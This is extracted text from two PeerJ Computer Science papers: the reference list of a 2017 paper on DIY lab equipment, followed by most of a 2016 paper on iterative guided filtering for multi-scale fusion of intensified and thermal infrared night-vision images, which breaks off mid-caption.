analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • Craig Bryan conceived and designed the experiments, contributed reagents/materials/- analysis tools, wrote the paper, performed the computation work, reviewed drafts of the paper. • Andrew E. Pelling performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, reviewed drafts of the paper. Data Availability The following information was supplied regarding data availability: Github: https://github.com/pellinglab/minerscope_and_twitterscope. REFERENCES Baden T. 2014. Biropette: customisable, high precision pipette. Thingiverse. Available at http://www.thingiverse.com/thing:255519. Leblanc-Latour et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.139 14/16 https://peerj.com https://github.com/pellinglab/minerscope_and_twitterscope http://www.thingiverse.com/thing:255519 http://dx.doi.org/10.7717/peerj-cs.139 Baden T, Chagas AM, Gage G, Marzullo T, Prieto-Godino LL, Euler T. 2015. Open Labware: 3-D printing your own lab equipment. PLOS Biology 13(3):e1002086 DOI 10.1371/journal.pbio.1002086. Cavanihac J-M. 2006. DIY: an inverted microscope with electronicfocusing. Micscape Magazine. Available at http://www.microscopy-uk.org.uk/mag/indexmag.html?http: //www.microscopy-uk.org.uk/mag/artaug06/jmc-constr1.html. Chai Biotechnologies Inc. 2014a. OpenPCR—the $649 open source pcrmachine/thermal cycler. Available at http://openpcr.org/ . Chai Biotechnologies Inc. 2014b. Open qPCR: the $2499 real-time PCR machine. Available at https://www.chaibio.com/openqpcr. Contreras-Naranjo JC, Wei Q, Ozcan A. 2016. Mobile phone-based microscopy, sensing, and diagnostics. IEEE Journal of Selected Topics in Quantum Electronics 22(3):392–405 DOI 10.1109/JSTQE.2016.2545685. Cybulski JS, Clements J, Prakash M. 2014. Foldscope: origami-based paper microscope. PLOS ONE 9(6):e98781 DOI 10.1371/journal.pone.0098781. Garvey C. 2012. Arduino water bath for DIYbio. Available at https://github.com/ cathalgarvey/KettleKontroller. Ibanez L. 2012. The kitware blog—DIY microscopy: optical mouse lens + iPad. Available at http://www.kitware.com/blog/home/post/256. Itseez. 2017. OpenCV. Available at http://opencv.org/ . Keulartz J, Van den Belt H. 2016. DIY-Bio—economic epistemological and ethical implications and ambivalences. Life Sciences, Society and Policy 12(1):1–19 DOI 10.1186/s40504-016-0034-6. Kim H, Gerber LC, Riedel-Kruse IH. 2016. nteractive biotechnology: building your own biotic game setup to play with living microorganisms. In: Proceedings of the 2016 CHI conference extended abstracts on human factors in computing systems. New York: ACM, 1000–1002. Landrain T, Meyer M, Perez AM, Sussan R. 2013. Do-it-yourself biology: challenges and promises for an open science and technology movement. Systems and Synthetic Biology 7(3):115–126 DOI 10.1007/s11693-013-9116-4. Long J. 2011. Gel electrophoresis system (mini). Available at http://www.instructables. com/id/Gel-electrophoresis-system-mini/ . McLeod E, Ozcan A. 2016. Unconventional methods of imaging: computational mi- croscopy and compact implementations. Reports on Progress in Physics 79(7):076001 DOI 10.1088/0034-4885/79/7/076001. Miller J. 2010. Open source orbital shaker. Available at https://www.thingiverse.com/ thing:2633507. Modulevsky DJ, Lefebvre C, Haase K, Al-Rekabi Z, Pelling AE. 2014. Apple derived cellulose scaffolds for 3D mammalian cell culture. PLOS ONE 9(5):e97835 DOI 10.1371/journal.pone.0097835. Pearce JM. 2012. Materials science. Building research equipment with free, open-source hardware. Science 337(6100):1303–1304 DOI 10.1126/science.1228183. Leblanc-Latour et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.139 15/16 https://peerj.com http://dx.doi.org/10.1371/journal.pbio.1002086 http://www.microscopy-uk.org.uk/mag/indexmag.html?http://www.microscopy-uk.org.uk/mag/artaug06/jmc-constr1.html http://www.microscopy-uk.org.uk/mag/indexmag.html?http://www.microscopy-uk.org.uk/mag/artaug06/jmc-constr1.html http://openpcr.org/ https://www.chaibio.com/openqpcr http://dx.doi.org/10.1109/JSTQE.2016.2545685 http://dx.doi.org/10.1371/journal.pone.0098781 https://github.com/cathalgarvey/KettleKontroller https://github.com/cathalgarvey/KettleKontroller http://www.kitware.com/blog/home/post/256 http://opencv.org/ http://dx.doi.org/10.1186/s40504-016-0034-6 http://dx.doi.org/10.1007/s11693-013-9116-4 http://www.instructables.com/id/Gel-electrophoresis-system-mini/ http://www.instructables.com/id/Gel-electrophoresis-system-mini/ http://dx.doi.org/10.1088/0034-4885/79/7/076001 https://www.thingiverse.com/thing:2633507 https://www.thingiverse.com/thing:2633507 http://dx.doi.org/10.1371/journal.pone.0097835 http://dx.doi.org/10.1126/science.1228183 http://dx.doi.org/10.7717/peerj-cs.139 Pelling AE. 2015. DIY CO2 incubator bioreactor for mammalian cell culture. Available at https://www.pellinglab.net/single-post/diy/DIY-CO2-Incubator-Bioreactor-for- Mammalian-Cell-Culture. Skandarajah A, Reber CD, Switz NA, Fletcher DA. 2014. Quantitative imaging with a mobile phone microscope. PLOS ONE 9(5):e96906 DOI 10.1371/journal.pone.0096906. Smith ZJ, Chu K, Espenson AR, Rahimzadeh M, Gryshuk A, Molinaro M, Dwyre DM, Lane S, Matthews D, Wachsmann-Hogiu S. 2011. Cell-phone-based platform for biomedical device development and education applications. PLOS ONE 6(3):e17150 DOI 10.1371/journal.pone.0017150. Switz NA, D’Ambrosio MV, Fletcher DA. 2014. Low-cost mobile phone mi- croscopy with a reversed mobile phone camera lens. PLOS ONE 9(5):e95330 DOI 10.1371/journal.pone.0095330. Synbiota. 2017. Synbiota homepage. Available at https://synbiota.com/ . Twitter, Inc. 2015. Connecting to a streaming endpoint. Available at https://dev.twitter. com/streaming/overview/connecting. Watts M. 2011. Magnetic Stirrer. Available at http://www.teklalabs.org/magnetic-stirrer/ . Wong AP, Gupta M, Shevkoplyas SS, Whitesides GM. 2008. Egg beater as centrifuge: isolating human blood plasma from whole blood in resource-poor settings. Lab Chip 8(12):2032–2037 DOI 10.1039/b809830c. Wong G, Wong I, Chan K, Hsieh Y, Wong S. 2015. A rapid and low-cost PCR thermal cycler for low resource settings. PLOS ONE 10(7):e0131701 DOI 10.1371/journal.pone.0131701. Yahoo!. 2015. Flickr: the flickr developer guide—API. Available at https://www.flickr. com/services/developer/api/ . Zhu H, Mavandadi S, Coskun AF, Yaglidere O, Ozcan A. 2011. Optofluidic fluorescent imaging cytometry on a cell phone. Analytical Chemistry 83(17):6641–6647 DOI 10.1021/ac201587a. Leblanc-Latour et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.139 16/16 https://peerj.com https://www.pellinglab.net/single-post/diy/DIY-CO2-Incubator-Bioreactor-for-Mammalian-Cell-Culture https://www.pellinglab.net/single-post/diy/DIY-CO2-Incubator-Bioreactor-for-Mammalian-Cell-Culture http://dx.doi.org/10.1371/journal.pone.0096906 http://dx.doi.org/10.1371/journal.pone.0017150 http://dx.doi.org/10.1371/journal.pone.0095330 https://synbiota.com/ https://dev.twitter.com/streaming/overview/connecting https://dev.twitter.com/streaming/overview/connecting http://www.teklalabs.org/magnetic-stirrer/ http://dx.doi.org/10.1039/b809830c http://dx.doi.org/10.1371/journal.pone.0131701 https://www.flickr.com/services/developer/api/ https://www.flickr.com/services/developer/api/ http://dx.doi.org/10.1021/ac201587a http://dx.doi.org/10.7717/peerj-cs.139 work_zsyuh5xaxnhyxbfjgxkd3jpzla ---- Submitted 4 June 2016 Accepted 28 July 2016 Published 22 August 2016 Corresponding author Alexander Toet, lextoet@gmail.com Academic editor Klara Kedem Additional Information and Declarations can be found on page 20 DOI 10.7717/peerj-cs.80 Copyright 2016 Toet Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Iterative guided image fusion Alexander Toet TNO Soesterberg, Netherlands ABSTRACT We propose a multi-scale image fusion scheme based on guided filtering. Guided filtering can effectively reduce noise while preserving detail boundaries. When applied in an iterative mode, guided filtering selectively eliminates small scale details while restoring larger scale edges. The proposed multi-scale image fusion scheme achieves spatial consistency by using guided filtering both at the decomposition and at the recombination stage of the multi-scale fusion process. First, size-selective iterative guided filtering is applied to decompose the source images into approximation and residual layers at multiple spatial scales. Then, frequency-tuned filtering is used to compute saliency maps at successive spatial scales. Next, at each spatial scale binary weighting maps are obtained as the pixelwise maximum of corresponding source saliency maps. Guided filtering of the binary weighting maps with their corresponding source images as guidance images serves to reduce noise and to restore spatial consistency. The final fused image is obtained as the weighted recombination of the individual residual layers and the mean of the approximation layers at the coarsest spatial scale. Application to multiband visual (intensified) and thermal infrared imagery demonstrates that the proposed method obtains state-of-the-art performance for the fusion of multispectral nightvision images. The method has a simple implementation and is computationally efficient. Subjects Computer Vision Keywords Image fusion, Guided filter, Saliency, Infrared, Nightvision, Thermal imagery, Intensified imagery INTRODUCTION The increasing deployment and availability of co-registered multimodal imagery from different types of sensors has spurred the development of image fusion techniques. The information provided by different sensors registering the same scene can either be (partially) redundant or complementary and may be corrupted with noise. Effective combinations of complementary and partially redundant multispectral imagery can therefore visualize information that is not directly evident from the individual input images. For instance, in nighttime (low-light) outdoor surveillance applications, intensified visual (II) or near- infrared (NIR) imagery often provides a detailed but noisy representation of a scene. While different types of noise may result from several processes associated with the underlying sensor physics, additive noise is typically the predominant noise component encountered in II and NIR imagery (Petrovic & Xydeas, 2003). Additive noise can be modelled as a random signal that is simply added to the original signal. As a result, additive noise may obscure or distort relevant image details. In addition, targets of interest like persons or cars How to cite this article Toet (2016), Iterative guided image fusion. PeerJ Comput. Sci. 2:e80; DOI 10.7717/peerj-cs.80 https://peerj.com mailto:lextoet@gmail.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.80 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://dx.doi.org/10.7717/peerj-cs.80 are sometimes hard to distinguish in II or NIR imagery because of their low luminance contrast. While thermal infrared (IR) imagery typically represents these targets with high contrast, their background (context) is often washed out due to low thermal contrast. In this case, a fused image that clearly represents both the targets and their background enables a user to assess the location of targets relative to landmarks in their surroundings, thus providing more information than either of the input images alone. Some potential benefits of image fusion are: wider spatial and temporal coverage, decreased uncertainty, improved reliability, and increased system robustness. Image fusion has important applications in defense and security for situational awareness (Toet et al., 1997), surveillance (Shah et al., 2013; Zhu & Huang, 2007), target tracking (Motamed, Lherbier & Hamad, 2005; Zou & Bhanu, 2005), intelligence gathering (O’Brien & Irvine, 2004), concealed weapon detection (Bhatnagar & Wu, 2011; Liu et al., 2006; Toet, 2003; Xue & Blum, 2003; Xue, Blum & Li, 2002; Yajie & Mowu, 2009), detection of abandoned packages (Beyan, Yigit & Temizel, 2011) and buried explosives (Lepley & Averill, 2011), and face recognition (Kong et al., 2007; Singh, Vatsa & Noore, 2008). Other important image fusion applications are found in industry (Tian et al., 2009), art analysis (Zitová, Beneš & Blažek, 2011), agriculture (Bulanona, Burks & Alchanatis, 2009), remote sensing (Ghassemian, 2001; Jacobson & Gupta, 2005; Jacobson, Gupta & Cole, 2007; Jiang et al., 2011) and medicine (Agarwal & Bedi, 2015; Biswas, Chakrabarti & Dey, 2015; Daneshvar & Ghassemian, 2010; Singh & Khare, 2014; Wang, Li & Tian, 2014; Yang & Liu, 2013) (for a survey of different applications of image fusion techniques see Blum & Liu (2006). In general, image fusion aims to represent the visual information from any number of input images in a single composite (fused) image that is more informative than each of the input images alone, eliminating noise in the process while preventing both the loss of essential information and the introduction of artefacts. This requires the availability of filters that combine the extraction of relevant image details with noise reduction. To date, a variety of image fusion algorithms have been proposed. A popular class of algorithms are the multi-scale image fusion schemes, which decompose the source images into spatial primitives at multiple spatial scales, then integrate these primitives to form a new (‘fused’) multi-scale representation, and finally apply an inverse multi-scale transform to reconstruct the fused image. Examples of this approach are for instance the Laplacian pyramid (Burt & Adelson, 1983), the Ratio of Low-Pass pyramid (Toet, 1989b), the contrast pyramid (Toet, Van Ruyven & Valeton, 1989), the filter-subtract-decimate Laplacian pyramid (Burt, 1988; Burt & Kolczynski, 1993), the gradient pyramid (Burt, 1992; Burt & Kolczynski, 1993), the morphological pyramid (Toet, 1989a), the discrete wavelet transform (Lemeshewsky, 1999; Li, Manjunath & Mitra, 1995; Li, Kwok & Wang, 2002; Scheunders & De Backer, 2001), the shift invariant discrete wavelet transform (Lemeshewsky, 1999; Rockinger, 1997; Rockinger, 1999; Rockinger & Fechner, 1998), the contourlet (Yang et al., 2010), the shift-invariant shearlet transform (Wang, Li & Tian, 2014), the non- subsampled shearlet transform (Kong, Wang & Lei, 2015; Liu et al., 2016; Zhang et al., 2015), the ridgelet transform (Tao, Junping & Ye, 2005). The filters applied in several of the earlier techniques typically produce halo artefacts near edges. More recent methods like Toet (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.80 2/26 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.80 shearlets, contourlets and ridgelets are better capable to preserve local image features but are often complex or time-consuming. Non-linear edge-preserving smoothing filters such as anisotropic diffusion (Perona & Malik, 1990), robust smoothing (Black et al., 1998) and the bilateral filter (Tomasi & Manduchi, 1998) may appear effective tools to prevent artefacts that arise from spatial inconsistencies in multi-scale image fusion schemes. However, anisotropic diffusion tends to over-sharpen edges and is computationally expensive, which makes it less suitable for application in multi-scale fusion schemes (Farbman et al., 2008). The non-linear bilateral filter (BLF) assigns each pixel a weighted mean of its neighbors, with the weights decreasing both with spatial distance and with difference in value (Tomasi & Manduchi, 1998). While the BLF is quite effective at smoothing small intensity changes while preserving strong edges and has efficient implementations, it also tends to blur across edges at larger spatial scales, thereby limiting its value for application in multi-scale image decomposition schemes (Farbman et al., 2008). In addition, the BLF has the undesirable property that it can reverse the intensity gradient near sharp edges (the weighted average becomes unstable when a pixel has only few similar pixels in its neighborhood: He, Sun & Tang, 2013). In the joint (or cross) bilateral filter (JBLF) a second or guidance image serves to steer the edge stopping range filter thus preventing over- or under- blur near edges (Petschnigg et al., 2004). Zhang et al. (2014) showed that the application of the JBLF in an iterative framework results in size selective filtering of small scale details combined with the recovery of larger scale edges. The recently introduced Guided Filter (GF: He, Sun & Tang, 2013) is a computationally efficient, edge-preserving translation-variant operator based on a local linear model which avoids the drawbacks of bilateral filtering and other previous approaches. When the input image also serves as the guidance image, the GF behaves like the edge preserving BLF. Hence, the GF can gracefully eliminate small details while recovering larger scale edges when applied in an iterative framework. In this paper we propose a multi-scale image fusion scheme, where iterative guided filtering is used to decompose the input images into approximate and residual layers at successive spatial scales, and guided filtering is used to construct the weight maps used in the recombination process. The rest of this paper is organized as follows. ‘Edge Preserving Filtering’ briefly discusses the principles of edge preserving filtering and introduces (iterative) guided filtering. In ‘Related Work’ we discuss related work. ‘Proposed Method’ presents the proposed guided fusion based image fusion scheme. ‘Methods and Material’ presents the imagery and computational methods that were used to assess the performance of the new image fusion scheme. The results of the evaluation study are presented in ‘Results.’ Finally, in ‘Discussion and Conclusions’ the results are discussed and some conclusions are presented. EDGE PRESERVING FILTERING In this section we briefly introduce the edge preserving bilateral and joint bilateral filters, show how they are related to the guided filter, and how the application of a guided filter in an iterative framework results in size selective filtering of small scale image details combined with the recovery of larger scale edges. Toet (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.80 3/26 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.80 Bilateral filter Spatial filtering is a common operation in image processing that is typically used to reduce noise or eliminate small spurious details (e.g., texture). In spatial filtering the value of the filtered image at a given location is a function (e.g., a weighted average) of the original pixel values in a small neighborhood of the same location. Although low pass filtering or blurring (e.g., averaging with Gaussian kernel) can effectively reduce image noise, it also seriously degrades the articulation of (blurs) significant image edges. Therefore, edge preserving filters have been developed that reduce small image variations (noise or texture) while preserving large discontinuities (edges). The bilateral filter is a non-linear filter that computes the output at each pixel as a Gaussian weighted average of their spatial and spectral distances. It prevents blurring across edges by assigning larger weights to pixels that are spatially close and have similar intensity values (Tomasi & Manduchi, 1998). It uses a combination of (typically Gaussian) spatial and a range (intensity) filter kernels that perform a blurring in the spatial domain weighted by the local variation in the intensity domain. It combines a classic low-pass filter with an edge-stopping function that attenuates the filter kernel weights at locations where the intensity difference between pixels is large. Bilateral filtering was developed as a fast alternative to the computationally expensive technique of anisotropic diffusion, which uses gradients of the filtering images itself to guide a diffusion process, avoiding edge blurring (Perona & Malik, 1990). More formally, at a given image location (pixel) i, the filtered output Oi is given by: Oi= 1 Ki ∑ j∈� Ij f (‖i−j‖) g(‖Ii−Ij‖) (1) where f is the spatial filter kernel (e.g., a Gaussian centered at i), g is the range or intensity (edge-stopping) filter kernel (centered at the image value at i), � is the spatial support of the kernel, and Ki is a normalizing factor (the sum of the f · g filter weights). Intensity edges are preserved since the bilateral filter decreases not only with the spatial distance but also with the intensity distance. Though the filter is efficient and effectively reduces noise while preserving edges in many situations, it has the undesirable property that it can reverse the intensity gradient near sharp edges (the weighted average becomes unstable when a pixel has only few similar pixels in its neighborhood: He, Sun & Tang, 2013). In the joint (or cross) bilateral filter (JBLF) the range filter is applied to a second or guidance image G (Petschnigg et al., 2004): Oi= 1 Ki ∑ j∈� Ij ·f (‖i−j‖)·g(‖Gi−Gj‖). (2) The JBLF can prevent over- or under- blur near edges by using a related image G to guide the edge stopping behavior of the range filter. That is, the JBLF smooths the image I while preserving edges that are also represented in the image G. The JBLF is particularly favored when the edges in the image that is to be filtered are unreliable (e.g., due to noise Toet (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.80 4/26 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.80 or distortions) and when a companion image with well-defined edges is available (e.g., in the case of flash /no-flash image pairs). Thus, in the case of filtering an II image for which a companion (registered) IR image is available, the guidance image may either be the II image itself or its IR counterpart. Guided filtering A guided image filter (He, Sun & Tang, 2013) is a translation-variant filter based on a local linear model. Guided image filtering involves an input image I, a guidance image G) and an output image O. The two filtering conditions are (i) that the local filter output is a linear transform of the guidance image G and (ii) as similar as possible to the input image I. The first condition implies that Oi=akGi+bk ∀i∈ωk (3) where ωk is a square window of size (2r+1)×(2r+1). The local linear model ensures that the output image O has an edge only at locations where the guidance image G has one, because ∇O=a∇G. The linear coefficients ak and bk are constant in ωk. They can be estimated by minimizing the squared difference between the output image O and the input image I (the second filtering condition) in the window ωk, i.e., by minimizing the cost function E: E(ak,bk)= ∑ i∈ωk ( (akGi+bk−Ii) 2 +εa2k ) (4) where ε is a regularization parameter penalizing large ak. The coefficients ak and bk can directly be solved by linear regression (He, Sun & Tang, 2013): ak = 1 |ω| ∑ i∈ωk GiIi−GkIk σ2k +ε (5) bk = Ik−akGk (6) where |ω| is the number of pixels in ωk, Ik and Gk represent the means of respectively I and G over ωk, and σ2k is the variance of I over ωk. Since pixel i is contained in several different (overlapping) windows ωk, the value of Oi in Eq. (3) depends on the window over which it is calculated. This can be accounted for by averaging over all possible values of Oi: Oi= 1 |ω| ∑ k|i∈ωk (akGk+bk). (7) Since ∑ k|i∈ωk ak = ∑ k∈ωiak due to the symmetry of the box window Eq. (7) can be written as Oi=aiGi+bi (8) where ai = 1 |ω| ∑ k∈ωiak and bi = 1 |ω| ∑ k∈ωibk are the average coefficients of all windows overlapping i. Although the linear coefficients (ai,bi) vary spatially, their gradients will be Toet (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.80 5/26 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.80 smaller than those of G near strong edges (since they are the output of a mean filter). As a result we have ∇O≈a∇G, meaning that abrupt intensity changes in the guiding image G are still largely preserved in the output image O. Equations (5), (6) and (8) define the guided filter. When the input image also serves as the guidance image, the guided filter behaves like the edge preserving bilateral filter, with the parameters ε and the window size r having the same effects as respectively the range and the spatial variances of the bilateral filter. Equations (8) can be rewritten as Oi= ∑ j Wij(G)Ij (9) with the weighting kernel Wij depending only on the guidance image G: Wij = 1 |ω|2 ∑ k:(i,j)∈ωk ( 1+ (Gi−Gk)(Gj−Gk) σ2k +ε ) . (10) Since ∑ jWij(G)=1 this kernel is already normalized. The guided filter is a computationally efficient, edge-preserving operator which avoids the gradient reversal artefacts of the bilateral filter. The local linear condition formulated by Eq. (3) implies that its output is locally approximately a scaled version of the guidance image plus an offset. This makes it possible to use the guided filter to transfer structure from the guidance image G to the output image O, even in areas where the input image I is smooth (or flat). This structure- transferring filtering is an useful property of the guided filter, and can for instance be applied for feathering/matting and dehazing (He, Sun & Tang, 2013). Iterative guided filtering Zhang et al. (2014) showed that the application of the joint bilateral filter (Eq. (2)) in an iterative framework results in size selective filtering of small scale details combined with the recovery of larger scale edges. In this scheme the result Gt+1 of the tth iteration is obtained from the joint bilateral filtering of the input image I using the result Gt of the previous iteration step as the guidance image: Gt+1i = 1 Ki ∑ j∈� Ij ·f (‖i−j‖)·g(‖G t i −G t j‖). (11) In this scheme, details smaller than the Gaussian kernel of the bilateral filter are removed while the edges of the remaining details are iteratively restored. Hence, this scheme allows the selective elimination of small scale details while preserving the remaining image structure. Note that the initial guidance image G1 can simply be a constant (e.g., zero) valued image since it updates to the Gaussian filtered input image in the first iteration step. Here we propose to replace the bilateral filter in this scheme by a guided filter to avoid any gradient reversal artefacts. Toet (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.80 6/26 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.80 RELATED WORK As mentioned before, most multi-scale transform-based image fusion methods introduce some artefacts because the spatial consistency is not well-preserved (Li, Kang & Hu, 2013). This has led to the use of edge preserving filters to decompose source images into approximate and residual layers while preserving the edge information in the fusion process. Techniques that have been applied include weighted least squares filter (Yong & Minghui, 2014), L1 fidelity using L0 gradient (Cui et al., 2015), L0 gradient minimization (Zhao et al., 2013), cross bilateral filter (Kumar, 2013) and anisotropic diffusion (Bavirisetti & Dhuli, 2016a). Li, Kang & Hu (2013) proposed to restore spatial consistency by using guided filtering in the weighted recombination stage of the fusion process. In their scheme, the input images are first decomposed into approximate and residual layers using a simple averaging filter. Next, each input image is then filtered with a Laplacian kernel followed by blurring with a Gaussian kernel, and the absolute value of the result is adopted as a saliency map that characterizes the local distinctness of the input image details. Then, binary weight maps are obtained by comparing the saliency maps of all input images, and assigning a pixel in an individual weight map the value 1 if it is the pixelwise maximum of all saliency maps, and 0 otherwise. The resulting binary weight maps are typically noisy and not aligned with object boundaries and may produce artefacts to the fused image. Li, Kang & Hu (2013) performed guided filtering on each weight map with its corresponding source layer as the guidance image, to reduce noise and to restore spatial consistency. The GF guarantees that pixels with similar intensity values have similar weights and weighting is not performed across edges. Typically a large filter size and a large blur degree are used to fuse the approximation layers, while a small filter size and a small blur degree are used to combine the residual layers. Finally, the fused image is obtained by weighted recombination of the individual source residual layers. Despite the fact that this method is efficient and can achieve state-of-the-art performance in most cases, it does not use edge preserving filtering in the decomposition stage and applies a saliency map that does not relate well to human visual saliency (Gan et al., 2015). In their multi-scale image fusion framework Gan et al. (2015) apply edge preserving filtering in the decomposition stage to extract well-defined image details (i.e., to preserve their edges) and use guided filtering in the weighted recombination stage to reduce spatial inconsistencies introduced by the weighting maps used in the reconstruction stage (i.e., to prevent edge artefacts like halos). First, a nonlinear weighted least squares edge-preserving filter (Farbman et al., 2008) is used to decompose the source images into approximate and residual layers. Next, phase congruency is used to calculate saliency maps that characterize the local distinctness of the source image details. The rest of their scheme is similar to that of Li, Kang & Hu (2013): binary weight maps are obtained from pixelwise comparison of the saliency maps corresponding to the individual source images; guided filtering is applied to these binary weight maps to recue noise and restore spatial consistency, and the fused image is obtained by weighted recombination of the individual source residual layers. Toet (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.80 7/26 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.80 Figure 1 Flow chart of the proposed image fusion scheme. The processing scheme is illustrated for two source images X and Y and 4 resolution levels (0–3). X0 and Y0 are the original input images, while Xi and Yi represent successively lower resolution versions obtained by iterative guided filtering. ‘Saliency’ repre- sents the frequency-tuned saliency transformation, ‘Max’ and ‘Mean’ respectively denote the pointwise maximum and mean operators, ‘(I)GF’ means (Iterative) Guided Filtering, ‘dX,’ ‘dY ’ and ‘dF’ are respec- tively the original and fused detail layers, ‘BW ’ the binary weight maps, and ‘W ’ the smooth weight maps. PROPOSED METHOD A flow chart of the proposed multi-scale decomposition fusion scheme is shown in Fig. 1. The algorithm consists of the following steps: 1. Iterative guided filtering is applied to decompose the source images into approximate layers (representing large scale variations) and residual layers (containing small scale variations). 2. Frequency-tuned filtering (Achanta et al., 2009) is used to generate saliency maps for the source images. Toet (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.80 8/26 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.80 3. Binary weighting maps are computed as the pixelwise maximum of the individual source saliency maps. 4. Guided filtering is applied to each binary weighting map with its corresponding source as the guidance image to reduce noise and to restore spatial consistency. 5. The fused image is computed as a weighted recombination of the individual source residual layers. In a hierarchical framework steps 1–4 are performed at multiple spatial scales. In this paper we used a 4 level decomposition obtained by filtering at three different spatial scales (see Fig. 1). Figure 2 shows the intensified visual (II) and thermal infrared (IR) or near infrared (NIR) images together with the results of the proposed image fusion scheme, for the 12 different scenes that were used in the present study. We will now discuss the proposed fusion scheme in more detail. Consider two co-registered source images X0(x,y) and Y0(x,y). The proposed scheme then applies iterative guided filtering (IGF) to the input images Xi and Yi to obtain progressively coarser image representations Xi+1 and Yi+1 (i>0): IGF(Xi,ri,εi)=Xi+1; i∈{0,1,2} (12) where the parameters εi and ri represent respectively the range and the spatial variances of the guided filter at iteration step i. In this study the number of iteration steps is set to 4. By letting each finer scale image serve as the approximate layer for the preceding coarser scale image the successive size-selective residual layers dXi are simply obtained by subtraction as follows: dXi=Xi−Xi+1; i∈{0,1,2}. (13) Figure 3 shows the approximate and residual layers that are obtained this way for the tank scene (nr 10 in Fig. 2). The edge-preserving properties of the iterative guided filter guarantee a graceful decomposition of the source images into details at different spatial scales. The filter size and regularization parameters used in this study are respectively set to ri={5,10,30} and εi={0.0001,0.01,0.1} for i={0,1,2}. Visual saliency refers to the physical, bottom-up distinctness of image details (Fecteau & Munoz, 2006). It is a relative property that depends on the degree to which a detail is visually distinct from its background (Wertheim, 2010). Since saliency quantifies the relative visual importance of image details saliency maps are frequently used in the weighted recombination phase of multi-scale image fusion schemes (Bavirisetti & Dhuli, 2016b; Cui et al., 2015; Gan et al., 2015). Frequency tuned filtering computes bottom-up saliency as local multi-scale luminance contrast (Achanta et al., 2009). The saliency map S for an image I is computed as S(x,y)= ∥∥Iµ−If (x,y)∥∥ (14) where Iµ is the arithmetic mean image feature vector, If represents a Gaussian blurred version of the original image, using a 5 × 5 separable binomial kernel, ‖‖ is the L2 norm (Euclidian distance), and x,y are the pixel coordinates. Toet (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.80 9/26 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.80 Figure 2 Original input and fused images for all 12 scenes. The intensified visual (II), thermal infrared (IR) or near infrared (NIR: scene 12) source images together with the result of the proposed fusion scheme (F) for each of the 12 scenes used in this study. A recent and extensive evaluation study comparing 13 state-of-the-art saliency models found that the output of this simple saliency model correlates more strongly with human visual perception than the output produced by any of the other available models (Toet, 2011). Toet (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.80 10/26 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.80 Figure 3 Base and detail layers for the tank scene. Original intensified visual (A) and thermal infrared (H) images for scene nr. 10, with their respective base B–D and I–K and detail E–G and L–N layers at suc- cessively lower levels of resolution. In the proposed fusion scheme we first compute saliency maps SXi and SYi for the individual source layers Xi and Yi, i∈{0,1,2}. Binary weight maps BWXi and BWYi are then computed by taking the pixelwise maximum of corresponding saliency maps SXi and SYi: BWXi(x,y)= { 1 if SXi(x,y)>SYi(x,y) 0 otherwise BWYi(x,y)= { 1 if SYi(x,y)>SXi(x,y) 0 otherwise. (15) The resulting binary weight maps are noisy and typically not well aligned with object boundaries, which may give rise to artefacts in the final fused image. Spatial consistency is therefore restored through guided filtering (GF) of these binary weight maps with the corresponding source layers as guidance images: WXi =GF(BWXi,Xi) WYi =GF(BWYi,Yi). (16) As noted before guided filtering combines noise reduction with edge preservation, while the output is locally approximately a scaled version of the guidance image. In the present scheme these properties are used to transform the binary weight maps into smooth Toet (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.80 11/26 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.80 Figure 4 Computing smoothed weight maps by guided filtering of binary weight maps. Saliency maps at levels 0, 1 and 2 for respectively the in- tensified visual (A–C) and thermal infrared (D–F) images from Fig. 3. Complementary binary weight maps for both image modalities (G–I and J– L) are obtained with a pointwise maximum operator at corresponding levels. Smooth continuous weight maps (M–O and P–R) are produced by guided filtering of the binary weight maps with their corresponding base layers as guidance images. continuous weight maps through guided filtering with the corresponding source images as guidance images. Figure 4 illustrates the process of computing smoothed weight maps by guided filtering of the binary weight maps resulting from the pointwise maximum of the corresponding source layer saliency maps for the tank scene. Fused residual layers are then computed as the normalized weighted mean of the corresponding source residual layers: dFi= WXi ·dXi+WYi ·dYi WXi+WYi . (17) The fused image F is finally obtained by adding the fused residual layers to the average value of the coarsest source layers: F = X3+Y3 2 + 2∑ i=0 dFi. (18) By using guided filtering both in the decomposition stage and in the recombination stage, this proposed fusion scheme optimally benefits from both the multi-scale edge-preserving characteristics (in the iterative framework) and the structure restoring capabilities (through guidance bythe originalsource images) ofthe guided filter. Themethod is easyto implement and computationally efficient. METHODS AND MATERIAL This section presents the test imagery and computational metrics used to assess the performance of the proposed images fusion scheme in comparison to existing multi-scale fusion schemes. Toet (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.80 12/26 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.80 Figure 5 Comparison with existing multiresolution fusion schemes. Original intensified visual (A) and thermal infrared (B) images for scene nr 10, and the fused results obtained with respectively a Contrast Pyramid (C), Gradient Pyramid (D), Laplace Pyramid (E), Morphological Pyramid (F), Ratio Pyramid 